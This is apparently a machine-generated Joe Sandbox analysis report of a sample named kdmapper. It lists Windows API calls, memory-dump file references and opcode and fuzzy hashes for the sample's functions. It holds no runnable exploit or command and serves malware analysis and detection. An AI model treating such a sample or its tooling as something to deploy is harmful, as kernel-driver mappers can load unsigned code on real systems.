                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00DE9EC7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DE9ED4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                              • Opcode ID: 0b9c91adc48373915d1dec851930e61ba9f2f4943f5910cb9bd5658fe58e0142
                                                                                                                                                                                                              • Instruction ID: 7f67a052266c8274f808a46c143c5db06af3ecfab548266353880778402370e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b9c91adc48373915d1dec851930e61ba9f2f4943f5910cb9bd5658fe58e0142
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55112530602740ABD734E63ACC51BAAF3E8AB44760F544A29F652E26D0E3B0ED49C770
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E08E75
                                                                                                                                                                                                                • Part of subcall function 00E08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38
                                                                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00E21098,00DE17CE,?,?,00000007,?,?,?,00DE13D6,?,00000000), ref: 00E08EB1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2447670028-0
                                                                                                                                                                                                              • Opcode ID: f6085812367f1399301736147fdc1f4595dbe85694ab6d1ba2f2e93ec99f7f3d
                                                                                                                                                                                                              • Instruction ID: 5c41b1cd256322ddc279dbdb5150f64593a82922160e34673eab906836d0d8aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6085812367f1399301736147fdc1f4595dbe85694ab6d1ba2f2e93ec99f7f3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AF0FC32601102AADB212A25DE04BAF37A88F91770F256115F9D8761D1DF70DDC281A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00DF10AB
                                                                                                                                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00DF10B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                                                                                              • Opcode ID: 81148981edee9ef6634ef50c4cd455d0c4c670e25fe28cb7bd333089744588ef
                                                                                                                                                                                                              • Instruction ID: f95311b1341b86b5221eee555f13765cbf69c4f58228b4b1040d001199e68663
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81148981edee9ef6634ef50c4cd455d0c4c670e25fe28cb7bd333089744588ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BE09A3AB00249EBCF0D8BB59C058FB72EEEA48244329C179E603E3101FD30EE454AB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501
                                                                                                                                                                                                                • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA532
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile$_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2673547680-0
                                                                                                                                                                                                              • Opcode ID: 02a18be92e2c0f311aa36095a0de5d6a4eb03f7067879f4793af06f684f63aa0
                                                                                                                                                                                                              • Instruction ID: 93600c41054fa88431c137e0faf32f581a925e4038ac079edf7d24e7da742903
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02a18be92e2c0f311aa36095a0de5d6a4eb03f7067879f4793af06f684f63aa0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CF0E53120024ABBDF026F61DC01FDA3BACAF08385F488451B944E5160DB31DBD8DB70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,00DE977F,?,?,00DE95CF,?,?,?,?,?,00E12641,000000FF), ref: 00DEA1F1
                                                                                                                                                                                                                • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00DE977F,?,?,00DE95CF,?,?,?,?,?,00E12641), ref: 00DEA21F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeleteFile$_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2643169976-0
                                                                                                                                                                                                              • Opcode ID: f353061ae4f149d73d3ab21e7ec43e4f795048b1284db8626e8cd6f2d76ef913
                                                                                                                                                                                                              • Instruction ID: c12ffe9f102fa70f5992f4ae4746c5e6bc93bf006ad487e90589b97edc372ffa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f353061ae4f149d73d3ab21e7ec43e4f795048b1284db8626e8cd6f2d76ef913
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09E092311402496BDB116F66DC45FEA379CAB0C381F488021BA44E2060EB61EE88DA74
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00E12641,000000FF), ref: 00DFACB0
                                                                                                                                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00E12641,000000FF), ref: 00DFACB5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3856339756-0
                                                                                                                                                                                                              • Opcode ID: e723ee89861195ae52f9d5477e4fc4ccf0cf84ed3d72d0844c7e6e3b7569be3f
                                                                                                                                                                                                              • Instruction ID: ff45f7b02a4b9f55a29ed16d478fb0964d7f7ce8b10c0776d4c4d980e6abf4d9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e723ee89861195ae52f9d5477e4fc4ccf0cf84ed3d72d0844c7e6e3b7569be3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAE06572604650EFC710AF59DC06B45FBA8FB88B20F104269F416E37B0CB746841CA90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00DEA23A,?,00DE755C,?,?,?,?), ref: 00DEA254
                                                                                                                                                                                                                • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00DEA23A,?,00DE755C,?,?,?,?), ref: 00DEA280
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile$_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2673547680-0
                                                                                                                                                                                                              • Opcode ID: eb14fe5ad6c65ced302208e2f8cbdf97809d47ac1dc7a814b02bb152a2d293d7
                                                                                                                                                                                                              • Instruction ID: 4bf7e76a3ffdf0ff20bbb0137fdcc8dd8e500b6f5e30e43522a045cff9ba1a50
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb14fe5ad6c65ced302208e2f8cbdf97809d47ac1dc7a814b02bb152a2d293d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DE06D715001689ACB10AB69CC05BD97798AB083E1F048361BE44F7190D670AE448AB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFDEEC
                                                                                                                                                                                                                • Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00DFDF03
                                                                                                                                                                                                                • Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                                                                                                                                                                • Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                                                                                                                                                                • Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010420,?), ref: 00DFB59E
                                                                                                                                                                                                                • Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                                                                                                                                                                • Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2718869927-0
                                                                                                                                                                                                              • Opcode ID: c0993916fa3ba3186a3650754583547d49f415a40d8ae52787db1297daf5448f
                                                                                                                                                                                                              • Instruction ID: feef99924e18fb11679e2efbd24cde1986117ca649fa64df2c571a6f362cb064
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0993916fa3ba3186a3650754583547d49f415a40d8ae52787db1297daf5448f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38E092B64003882ADF12BB62DC06FAE3B6C9B15785F444852B304EA1B2DA78EA158671
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DF0836
                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DEF2D8,Crypt32.dll,00000000,00DEF35C,?,?,00DEF33E,?,?,?), ref: 00DF0858
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                                                                                              • Opcode ID: 4547dced552db8728ba2874b27f9148809a2e27317eacf5b61de547cf01c4ad2
                                                                                                                                                                                                              • Instruction ID: 458af7b51e51627ae1198ad8c1fafb2b80c91b6b64df60a2aac73a6f2bccf7f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4547dced552db8728ba2874b27f9148809a2e27317eacf5b61de547cf01c4ad2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E01A768002686ADB11ABA59D09FEA7BACEF0D3D1F054065B649E2044DA74EA848AB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DFA3DA
                                                                                                                                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00DFA3E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1918208029-0
                                                                                                                                                                                                              • Opcode ID: d4d79e4e670905715b40f7060504bfccc2c4d31cfc66165f1294f902d6494f49
                                                                                                                                                                                                              • Instruction ID: fa895ed5c9fe5cc5376dfc5d03958ea188a9f0a168da584e7d57a428a516037f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4d79e4e670905715b40f7060504bfccc2c4d31cfc66165f1294f902d6494f49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BE0EDB150021CEBCB10DF99C5416A9BBE8EF04360F11C05AA99A93251E374AE44DBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E02BAA
                                                                                                                                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E02BB5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1660781231-0
                                                                                                                                                                                                              • Opcode ID: 1b8737929cfaf8d05c1fc9bab452244472ae9b74ef62c392817e1054935ec5cd
                                                                                                                                                                                                              • Instruction ID: 26a98f023f542f0c60cbc2f294f790abe8de1187717dd41505d2d73a46df0887
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b8737929cfaf8d05c1fc9bab452244472ae9b74ef62c392817e1054935ec5cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7D0223425430018EC142EB43C0F59833C9AE81BB8BE0778FF720F58C1EEA280C0B821
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemShowWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3351165006-0
                                                                                                                                                                                                              • Opcode ID: a434afd731d85c66a4a402eb9c81dc5a847a5d3ecdaac515288d197401f8f0c2
                                                                                                                                                                                                              • Instruction ID: dbce32e96efcf7def44fe86daa3350b5c861c9d8f27a254a33022b5e5f9a4d8e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a434afd731d85c66a4a402eb9c81dc5a847a5d3ecdaac515288d197401f8f0c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDC0123A05C240BFCB010BB5DC09C2BBBA8ABE6312F24C908B0A5D0261C238C114DB11
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                              • Opcode ID: 576b037d62f21d0455e755477d5c4546450d8b2e23cb31df77e0180181b05f90
                                                                                                                                                                                                              • Instruction ID: bba50b61f3bf4703b80ffe3389d7b932dccfdcb34e76bbf5c7dd167e89d505b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 576b037d62f21d0455e755477d5c4546450d8b2e23cb31df77e0180181b05f90
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0C1A338B002949FEF15EF6AC884BAD7BA5EF16310F1841B9EC45DB296DB309944CB71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
